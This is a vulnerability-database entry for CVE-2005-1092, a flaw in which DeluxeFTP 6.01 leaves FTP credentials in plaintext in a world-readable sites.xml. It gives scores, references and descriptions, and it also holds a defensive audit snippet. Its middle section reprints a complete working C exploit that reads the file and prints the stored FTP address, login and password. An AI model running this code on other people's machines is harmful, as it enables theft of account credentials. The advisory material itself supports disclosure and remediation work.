CVE-2005-1092
CVSS 7.2
Published: 2005-05-02 00:00:00
Last revised: 2008-09-05 16:48:11

[Original] Lightspeed DeluxeFTP 6.01 stores usernames and passwords in plaintext in sites.xml, which is world-readable, which allows local users to gain privileges.


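[CNNVD] Light Speed Technologies DeluxeFTP Local Authentication Credentials Disclosure Vulnerability (CNNVD-200505-647)

        Lightspeed DeluxeFTP 6.01 stores usernames and passwords in plaintext in sites.xml, which is world-readable; local users can use this to gain privileges.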

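- CVSS (Base Score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system shutdown]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]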

- CPE (Affected Platforms and Products)

cpe:/a:light_speed_technology:deluxeftp:7.0.1_beta
cpe:/a:light_speed_technology:deluxeftp:6.0.1

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1092
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1092
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-647
(Official data source) CNNVD

- Other Links and Resources

http://www.securityfocus.com/bid/13105
(UNKNOWN)  BID  13105
http://www.osvdb.org/15421
(UNKNOWN)  OSVDB  15421
http://secunia.com/advisories/14923
(VENDOR_ADVISORY)  SECUNIA  14923
http://lostmon.blogspot.com/2005/04/deluxeftp-plain-text-passwords.html
(VENDOR_ADVISORY)  MISC  http://lostmon.blogspot.com/2005/04/deluxeftp-plain-text-passwords.html

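- Vulnerability Information

Light Speed Technologies DeluxeFTP Local Authentication Credentials Disclosure Vulnerability
High risk    Access validation error
2005-05-02 00:00:00 2005-10-20 00:00:00
Local
        Lightspeed DeluxeFTP 6.01 stores usernames and passwords in plaintext in sites.xml, which is world-readable; local users can use this to gain privileges.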

- Advisories and Patches

        No data available

- Vulnerability Information (936)

DeluxeFtp 6.x Local Password Disclosure Exploit (EDBID:936)
windows local
2005-04-13 Verified
0 Kozan
N/A
/*******************************************************************

DeluxeFtp 6.x Local Password Disclosure Exploit by Kozan

Application: DeluxeFtp 6.x (and probably prior versions)
Vendor: www.deluxeftp.com
Vulnerable Description: DeluxeFtp 6.x discloses passwords
to local users.

Bug Discovered by: Lostmon
Exploit Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*******************************************************************/

#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>
#include <windows.h>


HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;


int adresal(char *FilePath,char *Str)
{
char kr;
int Sayac=0;
int Offset=-1;
FILE *di;
di=fopen(FilePath,"rb");

if( di == NULL )
{
/* fopen failed, so there is no stream to close */
return -1;
}

while(!feof(di))
{
Sayac++;
for(int i=0;i<strlen(Str);i++)
{
kr=getc(di);
if(kr != Str[i])
{
if( i>0 )
{
fseek(di,Sayac+1,SEEK_SET);
}
break;
}
if( i > ( strlen(Str)-2 ) )
{
Offset = ftell(di)-strlen(Str);
fclose(di);
return Offset;
}
}
}
fclose(di);
return -1;
}


char *oku(char *FilePath,char *Str)
{

FILE *di;
char cr;
int i=0;
static char Feature[500]; /* static: a pointer to this buffer is returned to the caller */

int Offset = adresal(FilePath,Str);

if( Offset == -1 )
return "";

if( (di=fopen(FilePath,"rb")) == NULL )
return "";

fseek(di,Offset+strlen(Str),SEEK_SET);

while(!feof(di))
{
cr=getc(di);
if(cr == '<')
break;
Feature[i] = cr;
i++;
}

Feature[i] = '\0';
fclose(di);
return Feature;
}




int main()
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{

lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE) prgfiles, &dwBufLen);

if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
{
RegCloseKey(hKey);
printf("An error occured!\n");
exit(1);
}

RegCloseKey(hKey);

}
else
{
/* the key was never opened, so there is no handle to close */
printf("An error occured!\n");
exit(1);
}

strcat(prgfiles,"\\DeluxeFTP\\sites.xml");


printf("DeluxeFtp 6.x Local Password Disclosure Exploit by Kozan\n");
printf("Bug Discovered by Lostmon\n");
printf("Exploit coded by Kozan\n");
printf("Credits to ATmaCA\n");
printf("www.netmagister.com - www.spyinstructors.com \n\n");
printf("This exploit only shows the first profile and its password.\n");
printf("You may improve it freely...\n\n");

char FtpAddress[BUFSIZE], FtpUsername[BUFSIZE], FtpPassword[BUFSIZE];

strcpy(FtpAddress,oku(prgfiles,"<ADDRESS>"));
strcpy(FtpUsername,oku(prgfiles,"<LOGIN>"));
strcpy(FtpPassword,oku(prgfiles,"<PASSWORD>"));

printf("Ftp Address : %s\n",FtpAddress);
printf("Ftp Username : %s\n",FtpUsername);
printf("Ftp Password : %s\n",FtpPassword);

return 0;
}

// milw0rm.com [2005-04-13]
		

- Vulnerability Information

15421
DeluxeFTP sites.xml Cleartext Password Disclosure
Local Access Required Authentication Management, Cryptographic, Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability Description

DeluxeFTP contains a flaw that may lead to unauthorized information disclosure. It is possible to gain access to the plain text username and password of the configured FTP sites when the program writes its configuration to the sites.xml file, which may lead to a loss of confidentiality.

- Timeline

2005-04-11 2005-04-09
2005-04-11 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related References

- Vulnerability Author

- Vulnerability Information

Light Speed Technologies DeluxeFTP Local Authentication Credentials Disclosure Vulnerability
Access Validation Error 13105
No Yes
2005-04-12 12:00:00 2009-07-12 12:56:00
Lostmon is credited with the discovery of this issue.

- Affected Program Versions

Light Speed Technology DeluxeFTP 6.0.1

- Vulnerability Discussion

A local authentication credentials disclosure vulnerability affects Light Speed Technologies DeluxeFTP. This issue is due to a failure of the application to properly secure authentication credentials by default.

An attacker may leverage this issue to gain access to authentication credentials for all FTP accounts stored in the offending file.
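
To find which stored accounts need their passwords changed, an audit can walk every profile in the file and list the login and address of each one that holds a non-empty password, without echoing the password. This is an added example, not code from the advisory or the exploit author; the `<ADDRESS>`, `<LOGIN>` and `<PASSWORD>` tag names come from the listing above, while the sample data, the element order and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>
/* Constructed sample. Tag names come from the exploit listing on this page;
   the ADDRESS, LOGIN, PASSWORD order within a profile is an assumption. */
static const char SAMPLE_SITES_XML[] =
    "<ADDRESS>ftp.example.test</ADDRESS><LOGIN>alice</LOGIN><PASSWORD>fake-1</PASSWORD>"
    "<ADDRESS>pub.example.test</ADDRESS><LOGIN>anon</LOGIN><PASSWORD></PASSWORD>"
    "<ADDRESS>bak.example.test</ADDRESS><LOGIN>bob</LOGIN><PASSWORD>fake-2</PASSWORD>";

/* Copy the body of the next <tag>...</tag> at or after pos into out, truncated
   to outsz-1 bytes. Returns the position after the closing tag, or NULL. */
static const char *next_element(const char *pos, const char *tag, char *out, size_t outsz)
{
    char open_tag[32], close_tag[32];
    snprintf(open_tag, sizeof open_tag, "<%s>", tag);
    snprintf(close_tag, sizeof close_tag, "</%s>", tag);
    const char *start = strstr(pos, open_tag);
    const char *end = start ? strstr(start, close_tag) : NULL;
    if (end == NULL) return NULL;          /* missing or unterminated element */
    start += strlen(open_tag);
    size_t n = (size_t)(end - start);
    if (n >= outsz) n = outsz - 1;
    memcpy(out, start, n);
    out[n] = '\0';
    return end + strlen(close_tag);
}

/* Returns how many profiles hold a non-empty cleartext password and lists
   login@address for each on report (may be NULL). pw[2] keeps only enough of
   the element to tell empty from non-empty; the password is never reported. */
int audit_sites_xml(const char *xml, FILE *report)
{
    char addr[128], login[128], pw[2];
    int exposed = 0;
    const char *p = xml;
    while ((p = next_element(p, "ADDRESS", addr, sizeof addr)) != NULL &&
           (p = next_element(p, "LOGIN", login, sizeof login)) != NULL &&
           (p = next_element(p, "PASSWORD", pw, sizeof pw)) != NULL) {
        if (pw[0] == '\0') continue;       /* nothing stored for this profile */
        exposed++;
        if (report) fprintf(report, "rotate: %s@%s\n", login, addr);
    }
    return exposed;
}

int main(void)
{
    printf("%d profile(s) to rotate\n", audit_sites_xml(SAMPLE_SITES_XML, stdout));
    return 0;
}
```

Every account the audit lists should be treated as exposed to all local users of the machine and have its password changed on the FTP server.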

- Exploit

No exploit is required to leverage this issue.

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related References
